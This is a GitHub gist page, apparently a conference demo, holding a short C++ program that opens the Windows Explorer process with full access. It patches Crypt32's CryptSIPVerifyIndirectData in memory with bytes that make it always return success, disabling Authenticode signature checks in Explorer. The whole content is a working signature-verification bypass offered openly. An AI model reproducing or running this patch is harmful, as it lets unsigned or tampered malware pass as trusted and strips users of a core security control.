Skip to content

Instantly share code, notes, and snippets.

@gavz
Forked from aaaddress1/signBypass.cpp
Created May 3, 2024 22:14
Show Gist options
  • Save gavz/1b2037f27ea09806f907afb2b7084c74 to your computer and use it in GitHub Desktop.
Save gavz/1b2037f27ea09806f907afb2b7084c74 to your computer and use it in GitHub Desktop.
// iThome 2020 Demo: Signature Patcher for Explorer
// author: aaaddress1@chroot.org
#include <iostream>
#include <Windows.h>
int main() {
DWORD explorer_pid;
GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", NULL), &explorer_pid);
if (HANDLE token = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid)) {
WriteProcessMemory(token, GetProcAddress(LoadLibraryA("Crypt32"), "CryptSIPVerifyIndirectData"), "\x48\x31\xC0\xFE\xC0\xC3", 6, NULL);
std::cout << "[+] Explorer.exe Patch Done." << std::endl;
}
else {
std::cout << "[!] Explorer.exe Alive yet?" << std::endl;
getchar();
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment